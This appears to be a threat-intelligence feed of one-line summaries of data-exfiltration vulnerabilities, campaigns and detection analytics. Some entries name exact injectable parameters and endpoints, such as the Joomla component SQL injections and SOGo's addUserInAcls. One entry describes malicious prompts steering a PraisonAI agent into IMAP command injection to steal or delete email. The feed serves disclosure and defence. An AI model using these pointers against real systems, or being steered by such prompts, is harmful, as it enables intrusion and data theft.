Data Exfiltration

An authenticated user can bypass the admin-configured `excluded_paths` security control in `jupyterlab-git` versions up to 0.53.0 by exploiting a case-sensitivity flaw on case-insensitive filesystems (e.g., macOS APFS, Windows NTFS), allowing unauthorized read access to git history and file content in explicitly excluded directories.

A high-severity vulnerability (CVE-2026-53489) in containerd's CRI plugin allows an unprivileged attacker to read arbitrary files on the host system by crafting a malicious checkpoint with a symlink that `containerd` follows during `container.log` restoration, enabling data exfiltration via `kubectl logs`.

An SQL injection vulnerability, CVE-2017-20265, in Joomla! Component Flip Wall 8.0 allows unauthenticated attackers to execute arbitrary SQL queries via malicious GET requests to the `wallid` parameter, enabling the extraction of sensitive database information.

An unauthenticated SQL injection vulnerability (CVE-2017-20263) in Joomla! Component FocalPoint Pro/Free version 1.2.3 allows attackers to execute arbitrary SQL queries via a crafted 'id' parameter in GET requests, leading to sensitive database information disclosure.

An unauthenticated attacker can exploit CVE-2017-20261, a critical SQL injection vulnerability in Joomla! Component Bargain Product VM3 1.0, by injecting malicious code into the 'product_id' parameter within GET requests to the 'brainy' or 'alice' views, allowing them to execute arbitrary SQL queries and extract sensitive database information.

Unauthenticated attackers can exploit an SQL injection vulnerability (CVE-2017-20258) in Joomla! Component RPC Responsive Portfolio 1.6.1 by injecting malicious code through the 'id' parameter in GET requests, allowing the execution of arbitrary SQL queries and extraction of sensitive database information.

An unauthenticated SQL injection vulnerability (CVE-2017-20257) in Joomla! Component Quiz Deluxe 3.7.4 allows attackers to execute arbitrary SQL commands and extract sensitive information via the `ajaxaction.flag_question` task using `stu_quiz_id` or `flag_quest` parameters.

Joomla NextGen Editor 2.1.0 contains an SQL injection vulnerability (CVE-2017-20252) that allows unauthenticated attackers to execute arbitrary SQL commands through the `plname` parameter in crafted GET requests to `index.php?option=com_nge&view=config`, leading to the extraction of sensitive database information.

A Russian-speaking threat group utilized a large dataset of administrative and VPN credentials, likely sourced from exposed FortiGate configuration files and active credential harvesting, to access government, critical infrastructure, and multinational corporate networks, resulting in widespread data exfiltration.

An unauthenticated attacker can exploit CVE-2026-55882 in Tilt HUD server versions 0.19.5 through 0.37.3, when exposed on a non-loopback address, by accessing the `/debug/pprof` endpoints to read sensitive process memory, including session and API server tokens, and to degrade application performance through prolonged CPU profiling or tracing.

A command injection vulnerability (CVE-NONE) exists in PraisonAI's `praisonaiagents` package (versions <= 1.6.48) where unsanitized LLM-controlled parameters are directly interpolated into IMAP SEARCH commands, allowing attackers to craft malicious prompts to inject arbitrary IMAP commands, leading to unauthorized email exfiltration, deletion, or denial-of-service when email tools are configured.

Multiple vulnerabilities discovered in Typo3 allow an attacker to achieve remote arbitrary code execution, privilege escalation, data confidentiality compromise, data integrity compromise, security policy bypass, remote indirect code injection (XSS), and SQL injection (SQLi).

Multiple vulnerabilities, including CVE-2025-10263, CVE-2026-42487, CVE-2026-42488, CVE-2026-42489, and CVE-2026-42490, have been discovered in Xen, allowing an attacker to achieve privilege escalation, trigger a remote denial of service, and compromise data confidentiality on vulnerable hypervisor instances.

Multiple critical vulnerabilities (CVE-2025-67862, CVE-2026-25089, CVE-2026-49938) have been discovered across Fortinet products including FortiOS, FortiPortal, FortiProxy, and FortiSandbox, enabling unauthenticated attackers to achieve remote arbitrary code execution and compromise data confidentiality.

A critical remote code execution vulnerability, tracked as CVE-2026-44963, has been discovered in Veeam Backup & Replication versions prior to 12.3.2.4854, which could allow an unauthenticated attacker to execute arbitrary code on affected systems, leading to full compromise of the backup infrastructure and potential data exfiltration or destruction.

The Atomic Arch campaign compromises orphaned Arch User Repository (AUR) packages, modifying their PKGBUILDs to install malicious npm/Bun dependencies like 'atomic-lockfile,' which deploy a Linux payload with credential harvesting, eBPF-based stealth, anti-debugging, and data exfiltration capabilities, impacting approximately 1,500 packages.

PraisonAI versions 4.6.37 and earlier are vulnerable to arbitrary file write due to missing path validation in the `write_file` function when `workspace=None`, allowing an attacker to write attacker-controlled content to arbitrary file paths on the victim's system via a malicious webpage.

Storm-2949 compromised cloud identities through social engineering and abused the Self-Service Password Reset (SSPR) process to bypass MFA and gain persistent access, enabling lateral movement and data exfiltration from Microsoft 365 and Azure environments.

SOGo 5.12.7 is vulnerable to SQL injection in the Access Control List management functionality, allowing authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint, which can be exfiltrated via the /acls API.

UNC6671, operating under the "BlackFile" brand, conducts a sophisticated extortion campaign targeting organizations through voice phishing (vishing) and single sign-on (SSO) compromise, using adversary-in-the-middle (AiTM) techniques to bypass MFA and exfiltrate sensitive corporate data.

The Database Backup for WordPress plugin up to version 2.5.2 is vulnerable to unauthorized database export due to improper authorization enforcement, allowing unauthenticated attackers to export database tables in WordPress Multisite environments.

Commercially available Unitree robots are susceptible to multiple vulnerabilities, including hardcoded keys and command injection, allowing attackers to gain root-level access, exfiltrate data, and potentially create physical botnets.

Attackers are abusing the legitimate file synchronization tool rclone, often renamed to masquerade as legitimate software, to exfiltrate data to cloud storage or remote endpoints.

Financially motivated threat actors are using social engineering techniques like vishing and credential harvesting to compromise enterprise SaaS environments, leading to data exfiltration and extortion.

Trigona ransomware is using a custom data exfiltration tool named 'uploader_client.exe' to steal data from compromised environments, enhancing speed and evasion.

A machine learning job has detected a spike in bytes written to an external device, which is anomalous and can signal illicit data copying or transfer activities, potentially leading to data exfiltration.

CrowdStrike Falcon AIDR now supports NVIDIA NeMo Guardrails, providing enterprise-grade protection for AI agents by defending against runtime attacks like prompt injection, redacting sensitive data, defanging malicious content, and moderating unwanted topics to ensure agents stay within compliance boundaries in sectors like finance, healthcare, customer service, and software development.

The Speagle malware hijacks the Cobra DocGuard application to exfiltrate sensitive data from infected machines to attacker-controlled Cobra DocGuard servers, effectively masking malicious traffic as legitimate DocGuard communication.

CVE-2026-27446 allows an unauthenticated remote attacker to inject malicious messages or exfiltrate data from Apache Artemis and ActiveMQ Artemis brokers due to a missing authentication check in the Core protocol.

A machine learning job has detected potential data exfiltration activity to an unusual geographical region, specifically by region name, indicating exfiltration over command and control channels.

A machine learning job has detected an unusually high file size shared by a remote host, indicating potential lateral movement as attackers bundle data into a single large file transfer to evade detection when exfiltrating valuable information.

A machine learning job has detected a spike in bytes of data written to an external device via Airdrop, potentially indicating illicit data copying or transfer activities.

A machine learning job has detected high bytes of data written to an external device, potentially indicating illicit data copying or transfer activities leading to data exfiltration over a physical medium such as USB.

A CSV/TSV injection vulnerability exists in wger <= 2.5, allowing malicious gym members to inject spreadsheet formulas into their profiles, which are then executed when an administrator exports and opens the member list, potentially leading to data exfiltration and remote code execution.

Adversaries may mount OneDrive shares as network drives using net.exe or net1.exe to stage, access, or exfiltrate data through cloud-hosted WebDAV paths, potentially bypassing traditional file share monitoring.

Adversaries may leverage Azure Storage utilities like AzCopy and Storage Explorer post-compromise to stage or extract sensitive data from endpoints, blending malicious activity with legitimate cloud traffic.

This analytic detects the execution of attacker tools used for unauthorized access, network scanning, privilege escalation, password dumping, or data exfiltration, based on process activity data from EDR agents and focusing on known attacker tool names.

Axios versions 0.19.0 through 1.13.6 are vulnerable to prototype pollution, allowing attackers to intercept and modify JSON responses, hijack HTTP requests, and exfiltrate sensitive data by polluting the Object.prototype with keys like `parseReviver` and `transport`.

A machine learning job detects a rare process writing data to an external device, potentially indicating data exfiltration masked by benign-looking processes.

Adversaries may leverage the `net.exe` utility to mount WebDav or hidden remote shares, potentially indicating lateral movement, data exfiltration preparation, or initial access via discovery of accessible shares.

This detection identifies potential misuse of Microsoft Devtunnels within Visual Studio by detecting image load events, indicating that an attacker could expose a compromised system or service to the internet for covert communication and data exfiltration.

This analytic identifies excessive ICMP traffic to external IP addresses exceeding 1,000 bytes, potentially indicating command and control activity, data exfiltration, or covert communication channels.